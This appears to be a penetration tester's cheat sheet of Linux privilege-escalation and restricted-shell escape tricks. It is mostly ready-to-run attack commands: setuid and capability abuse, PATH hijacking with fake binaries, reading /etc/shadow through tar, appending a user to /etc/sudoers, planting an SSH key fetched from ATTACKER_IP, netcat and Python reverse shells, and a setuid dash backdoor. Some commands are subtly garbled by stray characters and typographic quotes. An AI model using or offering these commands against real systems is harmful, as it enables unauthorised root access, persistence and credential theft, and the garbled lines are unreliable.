System Tricks

Resources

https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/
https://marc.info/?l=full-disclosure&m=128776663124692&w=2
# Search for a binary privesc
python3 gtfo -b systemctl


Recon and Enumeration

# Look for strange process
ps aux

# Look for setuid programs (everyone can run them as root)
find / -perm -4000
# Example, if perl
perl -e ‘$ENV{PATH}="/usr/bin";system("whoami");’ → root

# List processes running as root, permissions and NFS exports
echo 'services running as root'; ps aux | grep root;  echo 'permissions'; ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'; echo 'nfs info'; ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null

# Get a TTY shell after a reverse shell connection
python -c 'import pty;pty.spawn("/bin/bash")'

# Set PATH TERM and SHELL if they're missing
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export TERM=xterm
export SHELL=bash


Tricks

Public Keys / SSH

# Add public key to authorized keys
echo $(wget https://ATTACKER_IP/.ssh/id_rsa.pub) >> ~/.ssh/authorized_keys

# if RSA key is added for 127.0.0.1 you can switch users
ssh -i id_rsa root@127.0.0.1

Python sudoers

# Add an user to sudoers in python
#!/usr/bin/env python
import os
import sys
try:
        os.system('echo "username ALL=(ALL:ALL) ALL" >> /etc/sudoers')
except:
        sys.exit()

SSH update-motd

# When you login from SSH, welcome message etc are executed from /etc/update-motd.d
# Even if you connect in user, scripts are executed with root privileges

# If you can write here or in another folder in the PATH, you can force execution
# By redifining "date" or "uname" for example

# Example, if you can write to /usr/local/bin you can create a backdoored binary here
# If the folder is first in the PATH, the backdoored one will be executed first.

Escaping Shells

# Escaping lshell
echo FREEDOM! && cd () bash && cd

Path variable

# Create fake cat
echo "/bin/bash" > /tmp/cat
chmod 777 /tmp/cat
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin

# Update PATH
export PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin

# Go to root
cd /root
/usr/sbin/cat .flag.txt
# listinfo through date binary
cd /tmp
echo "/bin/sh" > date
chmod 777 date
echo $PATH
export PATH=/tmp:$PATH
/usr/bin/listinfo

Chrootkit

# Chrootkit
chrootkit -V
# Then Google / MSF

Capabilities

# Capabilities
export PATH=/bin:/sbin:/usr/bin:/usr/sbin:$PATH
getcap -r / 2>/dev/null
# TAR can read all files, so you can create a tar with a wanted file and than extract it
tar -cvf shadow.tar "/etc/shadow"
tar -xvf shadow.tar
cat etc/shadow

Overcome limited shells

# Some payloads to overcome limited shells
ssh user@$ip nc $localip 4444 -e /bin/sh
python -c 'import pty; pty.spawn("/bin/sh")'
export TERM=linux

# Python
python -c 'import pty; pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),   *$ 1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# Bash
echo os.system('/bin/bash')
/bin/sh -i
exec "/bin/sh";

# Perl
perl —e 'exec "/bin/sh";'
# /bin/dash is the only shell to keep the sticky bit, so if you run as root (included cron, or services running as root): 
install -mode 4755 /bin/dash /tmp/sh
# Then you will have a /tmp/sh that gives any user who calls it root !